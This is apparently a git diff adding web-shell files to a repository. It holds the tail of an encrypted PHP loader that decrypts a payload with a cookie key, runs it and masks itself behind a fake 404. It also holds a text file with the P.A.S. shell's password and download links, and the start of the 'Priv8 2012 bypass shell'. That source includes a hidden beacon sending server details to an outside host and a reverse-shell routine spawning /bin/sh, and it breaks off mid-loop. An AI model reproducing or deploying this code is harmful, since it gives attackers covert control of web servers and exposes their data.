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
+EsOvoro=
+'));if(isset($_COOKIE['sP']) && $_COOKIE['sP']!==NULL){$g__g_=$_COOKIE['sP'];$g__g_=md5($g__g_).substr(md5(strrev($g__g_)),0,strlen($g__g_));for($g____g_=0;$g____g_<15185;$g____g_++){$g___g_[$g____g_]=chr(( ord($g___g_[$g____g_])-ord($g__g_[$g____g_]))%256);$g__g_.=$g___g_[$g____g_];}if($g___g_=@gzinflate($g___g_)){$g____g_=create_function('',$g___g_);unset($g___g_,$g__g_);$g____g_();}} @header("Status: 404 Not Found"); ?>
\ No newline at end of file
diff --git a/php/pas/password.txt b/php/pas/password.txt
new file mode 100644
index 00000000..47f62056
--- /dev/null
+++ b/php/pas/password.txt
@@ -0,0 +1,21 @@
+
+    ╔══════════════════╗
+  ╔─╣ P.A.S. v.3.0.10  ╠─╗
+  ║ ╚══════════════════╝ ╚───────────────────────────────────────────────╗
+  ║                                                                      ║
+  ║ ╔────────────╗ ┌───────────────────────────────────────────────────┐ ║
+  ╠═╣ PASSWORD*  ╠─╣ root                                              │ ║
+  ║ ╚────────────╝ └───────────────────────────────────────────────────┘ ║
+  ║                                                                      ║
+  ║ ╔────────────╗ ┌───────────────────────────────────────────────────┐ ║
+  ╠═╣ DOWNLOAD   ╠─╣ http://profexer.name/pas/download.php             │ ║
+  ║ ╚────────────╝ └───────────────────────────────────────────────────┘ ║
+  ║                                                                      ║
+  ║ ╔────────────╗ ┌───────────────────────────────────────────────────┐ ║
+  ╠═╣ DiSCUSSiON ╠─╣ https://rdot.org/forum/showthread.php?t=1567      │ ║
+  ║ ╚────────────╝ │                                                   │ ║
+  ║                │ https://exploit.in/forum/index.php?showtopic=68238│ ║
+  ║   2011-2013    └───────────────────────────────────────────────────┘ ║
+  ╚══════════════════════════════════════════════════════════════════════╝
+
+  
\ No newline at end of file
diff --git a/php/priv8-2012-bypass-shell.php.txt b/php/priv8-2012-bypass-shell.php.txt
new file mode 100644
index 00000000..b6475d68
--- /dev/null
+++ b/php/priv8-2012-bypass-shell.php.txt
@@ -0,0 +1,2357 @@
+shell image:http://my.picresize.com/vault2/CY02MYRI70.jpg
+shell
+cgitelnetbypass1
+cgishell bypass
+python shell bypass
+ssi bypass
+php3.x bypass
+safe_mode bypass
+backconnect bypass
+server site list
+server site pageranks
+suexec bypass
+show source bypass
+file read bypass
+symlink all bypass
+metasploit backconnect
+eval code bypass
+python backconnect
+perl socket backconnect
+php backconnect
+
+coded by izleyici
+
+
+
+shell code:
+
+<BODY OnKeyPress="GetKeyCode();" text=#ffffff bottomMargin=0
+bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0
+marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse"
+height=0 cellSpacing=0 borderColorDark=#666666 cellPadding=2
+width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1
+bordercolor="#C0C0C0"><tr><th width="101%" height="2" nowrap
+bordercolor="#C0C0C0" valign="top" colspan="2"><center><font
+color="#0033FF">
+� � � � <pre>#Priv8 2011 Attack Shell#</pre>
+� <hr>
+� � � � <font face="Wingdings"><img border="0"
+src="http://priv8.iblogger.org/s.php?'+<?echo "uname -a : "; echo
+(php_uname())?>";" width="0" height="0"></a></font>
+</font>
+<a onclick="window.open('http://www.schliinberg.de/templates/pageranktara.php','POPUP','width=900
+0,height=500,scrollbars=10');return false;"
+href="http://www.schliinberg.de/templates/pageranktara.php"><font
+color="red"><b>Server Pagerank</b></font></a>&nbsp;<a
+onclick="window.open('http://networktools.nl/reverseip/actionhandler&toolAction=toolReverseIP&toolInput=<?php
+echo $_SERVER ['SERVER_ADDR']; ?>','POPUP','width=900
+0,height=500,scrollbars=10');return false;"
+href="http://networktools.nl/reverseip/actionhandler&toolAction=toolReverseIP&toolInput=<?php
+echo $_SERVER ['SERVER_ADDR']; ?>"><font color="green"><b>Site
+list</b></font></a>&nbsp;&nbsp;<a href="?BackConnect=PHP_6"><font
+color="yellow">Cgi Shell</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_7"><font color="white">Python
+Shell</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_8&bypass=cp"><font color="blue">Symlink
+Shell</font></a>&nbsp;&nbsp;<a href="?BackConnect=PHP_9"><font
+color="orange">perl Bypass Tools</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_10"><font color="yellow">Auto
+Root</font></a>&nbsp;&nbsp;<a href="?BackConnect=PHP_14"><font
+color="red">Kullan&#305;c&#305; List</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_15"><font
+color="pink">ShowsourceRead</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_11"><font color="orange">Cgi Shell Priv
+pass=dz</font></a>&nbsp;&nbsp;<a href="?BackConnect=PHP_16"><font
+color="green">Config Shell</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_18"><font
+color="orange">LitespeedBypas</font></a><br>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_19"><font
+color="pink">SsiBypass</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_20"><font
+color="red">SuExecByps</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_22"><font color="white">Wordpress Mysql Admin
+Shell</font></a>&nbsp;&nbsp;<a href="?BackConnect=PHP_23"><font
+color="white">Joomla Mysql Admin Shell</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_24"><font color="white">Php Eval
+Bypass</font></a>&nbsp;&nbsp;<a href="?BackConnect=PHP_25"><font
+color="white">Php4 Bind 8888 Eval</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_26"><font color="white">Cpanel+Ftp+Telnet
+Cracker</font></a>&nbsp;&nbsp;<a href="?BackConnect=PHP_27"><font
+color="white">Safe Mode php.ini</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_28"><font color="white">Mini
+Cgi</font></a><br>&nbsp;&nbsp;<a href="?BackConnect=PHP_29"><font
+color="red ">izo ozel ssi shell</font></a>&nbsp;&nbsp;<a
+href="?BackConnect=PHP_30"><font color="red">Php3.0 Priv8
+Bypass</font></a></td>
+</center></th></tr><tr><td>
+<?php
+function printit ($string) {
+� �if (!$daemon) {
+� � � print "$string\n";
+� �}
+}
+$bc = $_GET["BackConnect"];
+switch($bc){
+case "PHP_1":
+
+set_time_limit (0);
+$VERSION = "1.0";
+$ip = $_SERVER["REMOTE_ADDR"];
+$port = 22;
+$chunk_size = 1400;
+$write_a = null;
+$error_a = null;
+$shell = 'uname -a; w; id; /bin/sh -i';
+$daemon = 0;
+$debug = 0;
+if (function_exists('pcntl_fork')) {
+
+� �$pid = pcntl_fork();
+
+� �if ($pid == -1) {
+� � � printit("ERROR: Can't fork");
+� � � exit(1);
+� �}
+
+� �if ($pid) {
+� � � exit(0); �// Parent exits
+� �}
+� �if (posix_setsid() == -1) {
+� � � printit("Error: Can't setsid()");
+� � � exit(1);
+� �}
+
+� �$daemon = 1;
+} else {
+� �print("WARNING: Failed to daemonise. �This is quite common and not fatal.");
+}
+
+// Change to a safe directory
+chdir("/");
+
+// Remove any umask we inherited
+umask(0);
+
+//
+// Do the reverse shell...
+//
+
+// Open reverse connection
+$sock = fsockopen($ip, $port, $errno, $errstr, 30);
+if (!$sock) {
+� �printit("$errstr ($errno)");
+� �exit(1);
+}
+
+// Spawn shell process
+$descriptorspec = array(
+� �0 => array("pipe", "r"), �// stdin is a pipe that the child will read from
+� �1 => array("pipe", "w"), �// stdout is a pipe that the child will write to
+� �2 => array("pipe", "w") � // stderr is a pipe that the child will write to
+);
+
+$process = proc_open($shell, $descriptorspec, $pipes);
+
+if (!is_resource($process)) {
+� �printit("ERROR: Can't spawn shell");
+� �exit(1);
+}
+
+// Set everything to non-blocking
+// Reason: Occsionally reads will block, even though stream_select
+tells us they won't
+stream_set_blocking($pipes[0], 0);
+stream_set_blocking($pipes[1], 0);
+stream_set_blocking($pipes[2], 0);
+stream_set_blocking($sock, 0);
+
+printit("Successfully opened reverse shell to $ip:$port");
+
+while (1) {
